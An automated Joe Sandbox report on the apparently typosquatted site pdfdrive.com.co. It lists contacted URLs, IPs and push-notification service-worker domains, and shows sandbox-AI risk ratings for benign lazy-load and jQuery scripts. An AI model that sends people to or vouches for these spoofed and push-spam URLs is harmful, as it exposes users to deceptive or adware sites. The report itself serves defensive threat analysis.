https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015	false		high
https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44nFZoz502cOiFrgHoAY74HoAC4-2AtNvYv6MC&t1=506894&t2=2851560&tsid=16&clickid=cu0dup0hubcc73dr63tg&domain=open-2-view.com&lp_key=173647eae38e52225bc6a7306d6dc00a35b3599344&scenario=2&img=1	false	Avira URL Cloud: safe	unknown
https://cdn.larapush.com/uploads/enable_notifications_mobile.gif	false		high
https://code.jquery.com/jquery-3.7.1.js	false		high
https://cdn.larapush.com/uploads/enable_notifications.png	false		high
https://want-some-psh.net/icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog?wch=6780df4b	false		high
https://icon.eu.ptmnd.com/v2/641/e977ce71-cf2f-11ef-90a7-5eb0b9f2b61c/1/ic	false		high
https://fleraprt.com/push?clientId=1db9169f-90f4-4b2d-b517-bc47aab19c1f&clickId=oy2jl-meps1dn1ub8	false		high
https://onmanectrictor.com/www/images/7d20cd775493a41ac0770dfe82476b07.jpg	false		high
https://fleraprt.com/log/add?cid=1db9169f-90f4-4b2d-b517-bc47aab19c1f&ruid=ed23ba4c-c01e-41d9-a71d-bd8c8fd24843	false		high
https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44nFZoz502cOiFrgHoAY74HoAC4-2AtNvYv6MC&t1=506894&t2=2851560&tsid=16&clickid=cu0dup0hubcc73dr63tg&domain=open-2-view.com&lp_key=173647eae38e52225bc6a7306d6dc00a35b3599344&scenario=2&img=1#	false		unknown
https://want-some-psh.net/icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog	false		high
https://pdfdrive.com.co/	false		unknown
https://cdn4image.com/creatives/888/527/192_0_1736428969326.png	false		high
https://fleraprt.com/async_log/add?cid=1db9169f-90f4-4b2d-b517-bc47aab19c1f&ruid=ed23ba4c-c01e-41d9-a71d-bd8c8fd24843	false		high
https://realpush.realsh.xyz/favicon.ico	false		high
https://pushtorm.net/worker.js	false		high
https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/sw.js	false	Avira URL Cloud: safe	unknown
https://want-some-psh.net/icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog?wch=6780df51	false		high
https://cu0dup0hubcc73dr63tg.controlrushprotocol.co.in/subscription.js	false	Avira URL Cloud: safe	unknown
https://srv.eu.ptmnd.com/v2/641/e977ce71-cf2f-11ef-90a7-5eb0b9f2b61c/1/cl	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://stats.g.doubleclick.net/g/collect	chromecache_134.2.dr, chromecache_160.2.dr	false		high
https://bugs.webkit.org/show_bug.cgi?id=136851	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://html.spec.whatwg.org/#strip-and-collapse-whitespace	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://github.com/jquery/sizzle/issues/157)	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://promisesaplus.com/#point-75	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://srv.eu.ptmnd.com	chromecache_109.2.dr	false	Avira URL Cloud: safe	unknown
https://drafts.csswg.org/cssom/#common-serializing-idioms	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://bugs.webkit.org/show_bug.cgi?id=29084	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://www.google.com	chromecache_160.2.dr	false		high
https://www.youtube.com/iframe_api	chromecache_134.2.dr, chromecache_160.2.dr	false		high
https://bn4kb57rudcrwt.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44	chromecache_162.2.dr	false	Avira URL Cloud: safe	unknown
https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://github.com/jquery/jquery/pull/557)	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://bugs.chromium.org/p/chromium/issues/detail?id=378607	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=687787	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://bugs.chromium.org/p/chromium/issues/detail?id=470258	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://promisesaplus.com/#point-64	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://promisesaplus.com/#point-61	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://drafts.csswg.org/cssom/#resolved-values	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://bugs.chromium.org/p/chromium/issues/detail?id=589347	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://html.spec.whatwg.org/#nonce-attributes	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://html.spec.whatwg.org/multipage/syntax.html#attributes-2	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://promisesaplus.com/#point-59	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://jsperf.com/getall-vs-sizzle/2	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://promisesaplus.com/#point-57	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://promisesaplus.com/#point-54	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://cct.google/taggy/agent.js	chromecache_134.2.dr, chromecache_160.2.dr	false		high
https://drafts.csswg.org/selectors/#relational	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://8p4txvj5s68uk5.controlrushprotocol.co.in/01/?cid=b795b5d29eff25c3bd93&list=6&extclickid=GB44	chromecache_162.2.dr	false	Avira URL Cloud: safe	unknown
https://html.spec.whatwg.org/multipage/forms.html#category-listed	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://developer.mozilla.org/en-US/docs/CSS/display	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://jquery.org/license	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://jquery.com/	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://td.doubleclick.net	chromecache_134.2.dr, chromecache_160.2.dr	false		high
https://bugs.webkit.org/show_bug.cgi?id=137337	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://www.merchant-center-analytics.goog	chromecache_134.2.dr, chromecache_160.2.dr	false		high
https://promisesaplus.com/#point-48	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://github.com/jquery/sizzle/issues/299)	chromecache_94.2.dr	false		high
https://github.com/jquery/sizzle/pull/225	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://github.com/whatwg/html/issues/2369	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://bugs.chromium.org/p/chromium/issues/detail?id=449857	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://adservice.google.com/pagead/regclk?	chromecache_160.2.dr	false		high
https://bugs.jquery.com/ticket/13393	chromecache_146.2.dr, chromecache_94.2.dr	false		high
https://pushtorm.net/System/AddSubscriber	chromecache_111.2.dr, chromecache_129.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
169.150.247.34	unknown	United States	2711	SPIRITTEL-ASUS	false
142.132.255.57	pushtorm.net	Canada	22686	UNIVERSITYOFWINNIPEG-ASNCA	false
172.66.43.120	icon-adc.realsh.xyz	United States	13335	CLOUDFLARENETUS	false
104.21.92.101	pdfdrive.com.co	United States	13335	CLOUDFLARENETUS	true
104.16.80.73	unknown	United States	13335	CLOUDFLARENETUS	false
151.101.130.137	code.jquery.com	United States	54113	FASTLYUS	false
108.62.157.10	open-2-view.com	United States	396190	LEASEWEB-USA-SEA-10US	false
139.45.197.107	shoordaird.com	Netherlands	9002	RETN-ASEU	false
108.62.60.42	cu0dup0hubcc73dr63tg.controlrushprotocol.co.in	United States	396190	LEASEWEB-USA-SEA-10US	false
64.233.166.188	mobile-gtalk.l.google.com	United States	15169	GOOGLEUS	false
157.90.90.133	unknown	United States	766	REDIRISRedIRISAutonomousSystemES	false
88.198.55.100	cdn4image.com	Germany	24940	HETZNER-ASDE	false
104.21.96.1	my.rtmark.net	United States	13335	CLOUDFLARENETUS	false
104.16.79.73	static.cloudflareinsights.com	United States	13335	CLOUDFLARENETUS	false
143.244.56.53	impressions-ico-eu.b-cdn.net	United States	174	COGENT-174US	false
178.63.248.53	want-some-psh.net	Germany	24940	HETZNER-ASDE	false
216.58.212.132	www.google.com	United States	15169	GOOGLEUS	false
138.199.36.8	clicks-eu.b-cdn.net	European Union	51964	ORANGE-BUSINESS-SERVICES-IPSN-ASNFR	false
139.45.195.252	flerap.com	Netherlands	9002	RETN-ASEU	false
188.114.97.3	cdn.larapush.com	European Union	13335	CLOUDFLARENETUS	false
157.90.33.79	unknown	United States	766	REDIRISRedIRISAutonomousSystemES	false
109.206.175.73	realpush.realsh.xyz	Netherlands	50245	SERVEREL-ASNL	false
188.114.96.3	onmanectrictor.com	European Union	13335	CLOUDFLARENETUS	false
104.21.17.211	bytogeticr.com	United States	13335	CLOUDFLARENETUS	false
172.217.16.196	unknown	United States	15169	GOOGLEUS	false
104.21.11.245	tzegilo.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.24

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587377
Start date and time:	2025-01-10 09:49:02 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://pdfdrive.com.co
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.troj.win@22/134@76/27
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.131, 142.250.186.78, 108.177.15.84, 172.217.18.14, 142.250.185.174, 142.250.184.195, 142.250.186.170, 142.250.184.202, 216.58.212.138, 142.250.186.42, 216.58.212.170, 142.250.185.138, 142.250.186.106, 216.58.206.74, 142.250.185.74, 142.250.185.234, 142.250.181.234, 142.250.186.138, 142.250.185.202, 142.250.186.74, 142.250.74.202, 142.250.184.234, 216.58.206.40, 104.18.40.68, 172.64.147.188, 216.58.206.35, 142.250.186.40, 142.250.186.174, 172.217.18.110, 142.250.181.238, 172.217.16.202, 142.250.185.106, 142.250.185.170, 172.217.18.10, 172.217.23.106, 216.58.206.42, 142.250.186.110, 142.250.185.110, 172.217.16.206, 199.232.214.172, 142.250.186.99, 142.250.186.46, 2.23.242.162, 20.109.210.53, 40.126.31.69
Excluded domains from analysis (whitelisted): android.clients.google.com, client.wns.windows.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www.googleapis.com, x1.c.lencr.org, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, site-assets.fontawesome.com.cdn.cloudflare.net, login.live.com, www.googletagmanager.com, update.googleapis.com, clients.l.google.com, www.gstatic.com, c.pki.goog, www.google-analytics.com, mtalk.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://pdfdrive.com.co

Input	Output
URL: http://pdfdrive.com.co Model: Joe Sandbox AI	{ "typosquatting": true, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": true, "third_party_hosting": true }
URL: http://pdfdrive.com.co
URL: https://pdfdrive.com.co/... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script demonstrates some moderate-risk behaviors, such as external data transmission and aggressive DOM manipulation, but there are no clear indicators of malicious intent. The script appears to be a lazy-loading library for scripts, which is a common practice. However, the script could potentially be improved to reduce the risk score by providing more transparency around the external data transmission and reducing the aggressiveness of the DOM manipulation." }
class RocketLazyLoadScripts{constructor(){this.v="1.2.3",this.triggerEvents=["keydown","mousedown","mousemove","touchmove","touchstart","touchend","wheel"],this.userEventHandler=this._triggerListener.bind(this),this.touchStartHandler=this._onTouchStart.bind(this),this.touchMoveHandler=this._onTouchMove.bind(this),this.touchEndHandler=this._onTouchEnd.bind(this),this.clickHandler=this._onClick.bind(this),this.interceptedClicks=[],window.addEventListener("pageshow",t=>{this.persisted=t.persisted}),window.addEventListener("DOMContentLoaded",()=>{this._preconnect3rdParties()}),this.delayedScripts={normal:[],async:[],defer:[]},this.trash=[],this.allJQueries=[]}_addUserInteractionListener(t){if(document.hidden){t._triggerListener();return}this.triggerEvents.forEach(e=>window.addEventListener(e,t.userEventHandler,{passive:!0})),window.addEventListener("touchstart",t.touchStartHandler,{passive:!0}),window.addEventListener("mousedown",t.touchStartHandler),document.addEventListener("visibilitychange",t.userEventHandler)}_removeUserInteractionListener(){this.triggerEvents.forEach(t=>window.removeEventListener(t,this.userEventHandler,{passive:!0})),document.removeEventListener("visibilitychange",this.userEventHandler)}_onTouchStart(t){"HTML"!==t.target.tagName&&(window.addEventListener("touchend",this.touchEndHandler),window.addEventListener("mouseup",this.touchEndHandler),window.addEventListener("touchmove",this.touchMoveHandler,{passive:!0}),window.addEventListener("mousemove",this.touchMoveHandler),t.target.addEventListener("click",this.clickHandler),this._renameDOMAttribute(t.target,"onclick","rocket-onclick"),this._pendingClickStarted())}_onTouchMove(t){window.removeEventListener("touchend",this.touchEndHandler),window.removeEventListener("mouseup",this.touchEndHandler),window.removeEventListener("touchmove",this.touchMoveHandler,{passive:!0}),window.removeEventListener("mousemove",this.touchMoveHandler),t.target.removeEventListener("click",this.clickHandler),this._renameDOMAttribute(t.target,"rocket-onclick","onclick"),this._pendingClickFinished()}_onTouchEnd(t){window.removeEventListener("touchend",this.touchEndHandler),window.removeEventListener("mouseup",this.touchEndHandler),window.removeEventListener("touchmove",this.touchMoveHandler,{passive:!0}),window.removeEventListener("mousemove",this.touchMoveHandler)}_onClick(t){t.target.removeEventListener("click",this.clickHandler),this._renameDOMAttribute(t.target,"rocket-onclick","onclick"),this.interceptedClicks.push(t),t.preventDefault(),t.stopPropagation(),t.stopImmediatePropagation(),this._pendingClickFinished()}_replayClicks(){window.removeEventListener("touchstart",this.touchStartHandler,{passive:!0}),window.removeEventListener("mousedown",this.touchStartHandler),this.interceptedClicks.forEach(t=>{t.target.dispatchEvent(new MouseEvent("click",{view:t.view,bubbles:!0,cancelable:!0}))})}_waitForPendingClicks(){return new Promise(t=>{this._isClickPending?this._pendingClickFinished=t:t()})}_pendingClickStarted(){this._isClickPending=!0}_pendingClickFinished(){this._isClickPending=!1}_renameDOMAttribute(t,e,r){t.hasAttribute&&t.hasAttribute(e)&&(event.target.setAttribute(r,event.target.getAttribute(e)),event.target.removeAttribute(e))}_triggerListener(){this._removeUserInteractionListener(this),"loading"===document.readyState?document.addEventListener("DOMContentLoaded",this._loadEverythingNow.bind(this)):this._loadEverythingNow()}_preconnect3rdParties(){let t=[];document.querySelectorAll("script[type=rocketlazyloadscript]").forEach(e=>{if(e.hasAttribute("src")){let r=new URL(e.src).origin;r!==location.origin&&t.push({src:r,crossOrigin:e.crossOrigin\|\|"module"===e.getAttribute("data-rocket-type")})}}),t=[...new Map(t.map(t=>[JSON.stringify(t),t])).values()],this._batchInjectResourceHints(t,"preconnect")}async _loadEverythingNow(){this.lastBreath=Date.now(),this._delayEventListeners(this),this._delayJQueryReady(this),this._handleDocumentWrite(),this._registerAllDelayedScripts(),this._pre
URL: https://pdfdrive.com.co/wp-includes/js/jquery/jque... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is well-structured and does not exhibit any obfuscation or aggressive DOM manipulation. Overall, this script is likely benign and used for legitimate web development purposes." }
/! jQuery v3.7.1 \| (c) OpenJS Foundation and other contributors \| jquery.org/license / !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n\|\|C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e\|\|"function"==typeof e?n[i.call(e)]\|\|"object":typeof e}var t="3.7.1",l=/HTML$/i,ce=function(e,t){return new ce.fn.init(e,t)};function c(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!v(e)&&!y(e)&&("array"===n\|\|0===t\|\|"number"==typeof t&&0<t&&t-1 in e)}function fe(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()}ce.fn=ce.prototype={jquery:t,constructor:ce,length:0,toArray:function(){return ae.call(this)},get:function(e){return null==e?ae.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=ce.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return ce.each(this,e)},map:function(n){return this.pushStack(ce.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(ae.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(ce.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(ce.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]\|\|{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]\|\|{},s++),"object"==typeof a\|\|v(a)\|\|(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(ce.isPlainObject(r)\|\|(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i\|\|ce.isPlainObject(n)?n:{},i=!1,a[t]=ce.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},ce.extend({expando:"jQuery"+(t+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e\|\|"[object Object]"!==i.call(e))&&(!(t=r(e))\|\|"function"==typeof(n=ue.call(t,"constructor")&&t.constructor)&&o.call(n)===a)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){m(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(c(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},text:function(e){var t,n="",r=0,i=e.nodeType;if(!i)while(t=e[r++])n+=ce.text(t);return 1===i\|\|11===i?e.textContent:9===i?e.documentElement.textContent:3===i\|\|4===i?e.nodeValue:n},makeArray:function(e,t){var n=t\|\|[];return null!=e&&(c(Object(e))?ce.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument\|\|e).documentElement;return!l.test(t\|\|n&&n.nodeName\|\|"HTML")},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){va
URL: https://pdfdrive.com.co/... Model: Joe Sandbox AI	{ "risk_score": 3, "reasoning": "The provided JavaScript snippet appears to be a browser compatibility check and URL modification for Internet Explorer and Trident-based browsers. It checks the user agent string and, if the user is on an affected browser, it modifies the current URL to include a 'nowprocket' parameter. This behavior is likely intended to enable a specific functionality or feature, and does not demonstrate any high-risk indicators. The script is considered low-risk with some moderate-risk indicators related to URL manipulation." }
if(navigator.userAgent.match(/MSIE\|Internet Explorer/i)\|\|navigator.userAgent.match(/Trident\/7\..*?rv:11/i)){var href=document.location.href;if(!href.match(/[?&]nowprocket/)){if(href.indexOf("?")==-1){if(href.indexOf("#")==-1){document.location.href=href+"?nowprocket=1"}else{document.location.href=href.replace("#","?nowprocket=1#")}}else{if(href.indexOf("#")==-1){document.location.href=href+"&nowprocket=1"}else{document.location.href=href.replace("#","&nowprocket=1#")}}}}
URL: https://pdfdrive.com.co/... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript code appears to be a legitimate implementation of a lazy-loading mechanism for YouTube video thumbnails and iframes. It does not exhibit any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is primarily focused on enhancing the user experience by lazily loading YouTube content, which is a common and accepted practice. While it uses some legacy APIs like `XDomainRequest`, the overall behavior is consistent with its intended purpose and does not raise significant security concerns." }
function lazyLoadThumb(e,alt){var t='<img data-lazy-src="//i.ytimg.com/vi_webp/ID/hqdefault.webp" alt="" width="480" height="360"><noscript><img src="//i.ytimg.com/vi_webp/ID/hqdefault.webp" alt="" width="480" height="360"></noscript>',a='<button class="play" aria-label="play Youtube video"></button>';t=t.replace('alt=""','alt="'+alt+'"');return t.replace("ID",e)+a}function lazyLoadYoutubeIframe(){var e=document.createElement("iframe"),t="ID?autoplay=1";t+=0===this.parentNode.dataset.query.length?'':'&'+this.parentNode.dataset.query;e.setAttribute("src",t.replace("ID",this.parentNode.dataset.src)),e.setAttribute("frameborder","0"),e.setAttribute("allowfullscreen","1"),e.setAttribute("allow", "accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture"),this.parentNode.parentNode.replaceChild(e,this.parentNode)}document.addEventListener("DOMContentLoaded",function(){var e,t,p,a=document.getElementsByClassName("rll-youtube-player");for(t=0;t<a.length;t++)e=document.createElement("div"),e.setAttribute("data-id",a[t].dataset.id),e.setAttribute("data-query", a[t].dataset.query),e.setAttribute("data-src", a[t].dataset.src),e.innerHTML=lazyLoadThumb(a[t].dataset.id,a[t].dataset.alt),a[t].appendChild(e),p=e.querySelector('.play'),p.onclick=lazyLoadYoutubeIframe});
URL: https://pdfdrive.com.co/wp-content/plugins/wp-rock... Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": "The provided JavaScript snippet appears to be a lazy-loading library for images and other media elements. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script is focused on improving performance by deferring the loading of resources until they are needed, which is a common and legitimate practice. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script is likely benign and can be considered low risk." }
!function(n,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(n="undefined"!=typeof globalThis?globalThis:n\|\|self).LazyLoad=t()}(this,(function(){"use strict";function n(){return n=Object.assign\|\|function(n){for(var t=1;t<arguments.length;t++){var e=arguments[t];for(var i in e)Object.prototype.hasOwnProperty.call(e,i)&&(n[i]=e[i])}return n},n.apply(this,arguments)}var t="undefined"!=typeof window,e=t&&!("onscroll"in window)\|\|"undefined"!=typeof navigator&&/(gle\|ing\|ro)bot\|crawl\|spider/i.test(navigator.userAgent),i=t&&"IntersectionObserver"in window,o=t&&"classList"in document.createElement("p"),a=t&&window.devicePixelRatio>1,r={elements_selector:".lazy",container:e\|\|t?document:null,threshold:300,thresholds:null,data_src:"src",data_srcset:"srcset",data_sizes:"sizes",data_bg:"bg",data_bg_hidpi:"bg-hidpi",data_bg_multi:"bg-multi",data_bg_multi_hidpi:"bg-multi-hidpi",data_bg_set:"bg-set",data_poster:"poster",class_applied:"applied",class_loading:"loading",class_loaded:"loaded",class_error:"error",class_entered:"entered",class_exited:"exited",unobserve_completed:!0,unobserve_entered:!1,cancel_on_exit:!0,callback_enter:null,callback_exit:null,callback_applied:null,callback_loading:null,callback_loaded:null,callback_error:null,callback_finish:null,callback_cancel:null,use_native:!1,restore_on_error:!1},c=function(t){return n({},r,t)},l=function(n,t){var e,i="LazyLoad::Initialized",o=new n(t);try{e=new CustomEvent(i,{detail:{instance:o}})}catch(n){(e=document.createEvent("CustomEvent")).initCustomEvent(i,!1,!1,{instance:o})}window.dispatchEvent(e)},u="src",s="srcset",d="sizes",f="poster",_="llOriginalAttrs",g="data",v="loading",b="loaded",m="applied",p="error",h="native",E="data-",I="ll-status",y=function(n,t){return n.getAttribute(E+t)},k=function(n){return y(n,I)},w=function(n,t){return function(n,t,e){var i="data-ll-status";null!==e?n.setAttribute(i,e):n.removeAttribute(i)}(n,0,t)},A=function(n){return 